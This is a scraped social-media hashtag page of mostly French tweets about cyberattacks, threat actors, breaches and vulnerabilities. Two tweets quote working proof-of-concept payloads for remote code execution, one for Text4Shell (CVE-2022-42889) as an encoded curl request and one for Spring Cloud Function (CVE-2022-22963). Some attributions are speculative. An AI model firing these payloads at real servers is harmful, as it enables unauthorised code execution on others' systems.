Top Tweets for #BreakingtheShell

Par quels moyens les pirates du monde entier se sont procuré des accès rdp et autres a l ensemble des infrastructures du monde entier .. Lazarus a lancé l opération #breakingtheshell il y a deux ans et les impacts sont entrain de se faire ressentir
Pourquoi la surface d'attaque de #log4shell est tentaculaire:
- robots.txt 😏
- enregistrements dns (txt...)
- header de vos emails
- noms d'utilisateurs
- mots de passe
- header web
- adresses e-mail
- nom de fichiers
- certificats SSL
- EXIF ; metadonnés
- cookies
LilacSquid, un groupe de cyberespionnage qui cible les secteurs de l'informatique, de l'énergie et de la pharmacie aux États-Unis, en Europe et en Asie depuis 2021. Ce groupe utilise les techniques de #lazarus .. la Corée du Nord a pirate l occident #breakingtheshell
Researchers uncover LilacSquid, a previously unknown cyber espionage group targeting IT, energy, and pharmaceutical sectors in the U.S., Europe, and Asia since 2021.
Learn more: https://t.co/lln1rp5tBD
#infosec #cybersecurity
Les États-Unis démantelent le plus grand botnet 911 S5 au monde avec 19 millions d'appareils infectés..Le botnet, dont l'empreinte mondiale s'étend sur plus de 190 pays , fonctionnait comme un service proxy résidentiel connu sous le nom de 911 S5 . #breakingtheshell
🔥 U.S. takes down "911 S5," the world's largest BOTNET, spanning 190 countries and 19 MILLION infected devices.
Chinese ADMIN arrested, leading to disruption of 23 domains, 70+ servers, and seizure of $30 million in assets.
Details: https://t.co/Tm8xnEWG6q
#cybersecurity
Est ce qu on va répéter le cycle de 7 ans ? #breakingtheshell
#CyberChronicles🗞️
7 years ago, at 07:44 UTC on May 12, 2017, the worldwide WannaCry ransomware attack began.
The attack was estimated to have affected more than 300,000 computers across 150 countries, with total damages ranging from hundreds of millions to billions of dollars.
Nissan Motor Manufacturing UK in Tyne and Wear, England, halted production after the ransomware infected some of their systems. Renault also stopped production at several sites in an attempt to stop the spread of the ransomware. Spain's Telefónica, FedEx, and Deutsche Bahn were hit, along with many other countries and companies worldwide.
#ransomware #wannacry

Les victimes des pirates marocains : le ministère israélien de la défense - Bank of America - l'hôpital américain My Clinic - la société indienne Airtel et l'administration américaine de la sécurité sociale. #cyberwarfare #breakingtheshell
On continue la cyclicité des attaques : La société américaine #Okta , spécialisée dans la gestion des identités numériques, a signalé le 31 août une série d'attaques utilisant des méthodes d'ingénierie sociale contre ses spécialistes. #breakingtheshell
https://t.co/Vi3mWCrnP1
"Fin août, un tiers a informé Okta qu'il possédait une copie de certains référentiels de code Auth0 datant d'octobre 2020 et d'avant".
Auth0 est utilisée pour authentifier plus de 42 millions de connexions chaque jour par plus de 2 000 entreprises
https://t.co/LA6dSekDjW
Dans la nuit du 4 au 5 juillet, la Russie a mèné des exercices, éteignant l'Internet international; Runet est à l'essai et le timing est parfait #cyberpolygon #breakingtheshell
https://t.co/AmnChpIyW4

Oh ben tiens ca va se transformer en épidémie de vulnérabilité #4shell ; Qu'est ce qui se passe le "virus" se propage et mute ; Va il évoluer vers un "worm" très dangereux ; #breakingtheshell
Apache Text4Shell (CVE-2022-42889)
PoC
curl http://localhost/text4shell/attack?search=%24%7Bscript%3Ajavascript%3Ajava.lang.Runtime.get.Runtime%28%29.exec%28%5C%27%27%2E%74%72%69%6D%28%24%63%6D%64%29%2E%27%5C%27%29%7D
https://t.co/WdlwKBOBxZ
https://t.co/KXmFl2VAJf

Lloyd's de Londres touché par une cyberattaque
Ils ont dû redémarrer le réseau et informé les acteurs du marché et les parties concernées et ont promis de fournir des informations supplémentaires une fois l'enquête terminée. #cyberwar #breakingtheshell
https://t.co/wo2KlLDMbd
On apprend donc que le groupe lazarus #apt38 exploite donc déjà les vulnérabilités de Dell ; #breakingtheshell Cette attaque fait partie de la campagne Dreamjobs mener depuis plusieurs années de facon internationnalle et multisectorielle par les pirates de la Corée du nord
Dell a publié des correctifs pour 5 graves vulnérabilités dans son pilote de mise à jour ( CVE-2021-21551 ) ; Ces vulnérabilités sont présentes dans les appareils Dell depuis 2009 ; Une #supplychainattack est envisageable ; Produits #dell & @sonicwall
https://t.co/iWj9etQUbl
Le gang de r#ansomware Everest leak actuellement les données du ministère de l’économie d’argentine ; Nous voyons de plus en plus de leak d’institutions national .. Ce phénomène devrait continuer a s'intensifier .. #breakingtheshell #WW3
Yesterday, @juanbrodersen reported that a possibly Everest-linked actor was attempting to sell data allegedly stolen from the Argentinian Ministerio de Economía on a forum. Today, this was posted on Everest's leak site.
https://t.co/5d7CdVZKQ2

#TBT to #BreakingtheShell and #PickedApart: two reports, ten years apart, on the crab-picking industry. ¿Our main finding? Migrant workers have seen important improvements in their living & working conditions, but still face challenges. Learn more here: https://t.co/qTpo5fgklD
Plus de 48H de panne dans les solutions de chez @Atlassian ; c'est a se demander si gens ont compris qu'il était client de chez #okta ; Les solutions Jira et Confluence sont utilisé par de nombreuses entreprise a travers le monde #breakingtheshell #cyberwar

Atlassian est un éditeur de logiciels, basé en Australie, qui développe des produits pour la gestion de développement : Jira, Confluence, Bamboo, Bitbucket5 et Trello6.Voila la team des vainqueurs qui avaient des instances vulnérable en 2020-2021 et exploité par les apt #cyberwar

Une vulnérabilité vieille de 17 ans a été corrigée dans la lib de compression de données Zlib largement utilisé (Google ; Apple; Firefox) ; Elle avait déjà été signalé en 2018 (CVE-2018-25032 ) mais n'avait pas été corrigé 🧐 #cyberwar #breakingtheshell
https://t.co/HOxZCFTkr7

🚨Pour ceux qui avaient toujours pas compris ; Il est donc possible grâce a #log4hell de construire des payload contre presque toutes les solutions écritent en java ; Exemple avec SpringShell: Spring Core RCE 0-day Vulnerability 🙃😇🤡 #banjava #breakingtheshell #lazarus
Spring Cloud Function Spel RCE aka CVE-2022-22963 POC.
payload
https://t.co/4Yb3FFRFoC.function.routing-expression: T(java.lang.Runtime).getRuntime().exec("xcalc")

"On ne sait pas si d'autres clients de Sykes, dont Twilio, Cisco, DocuSign, Apple, PayPal, Splunk et Dell, ont été touchés." 🙃 #oktabreach #breakingtheshell #lazarus #cyberwar
https://t.co/y3TjyoiAYx
Hi @cisco it looks like you are using @okta; It would be interesting to check if you have not been compromised during #cyberwar #breakingtheshell

Trends for you
Most Popular Users

Elon Musk 
@elonmusk
240.8M followers

Barack Obama 
@barackobama
119.2M followers

Donald J. Trump 
@realdonaldtrump
111.7M followers

Cristiano Ronaldo 
@cristiano
111.1M followers

Narendra Modi 
@narendramodi
107M followers

Rihanna 
@rihanna
97.8M followers

NASA 
@nasa
92.2M followers

Justin Bieber 
@justinbieber
91M followers

KATY PERRY 
@katyperry
87.9M followers

Taylor Swift 
@taylorswift13
81.7M followers

Lady Gaga 
@ladygaga
73.3M followers

Virat Kohli 
@imvkohli
70.3M followers

Kim Kardashian 
@kimkardashian
69.9M followers

YouTube 
@youtube
68.7M followers

Bill Gates 
@billgates
64M followers

Neymar Jr 
@neymarjr
63.1M followers

The Ellen Show
@theellenshow
62.4M followers

CNN 
@cnn
61.9M followers

Selena Gomez 
@selenagomez
61M followers

X 
@x
60.8M followers








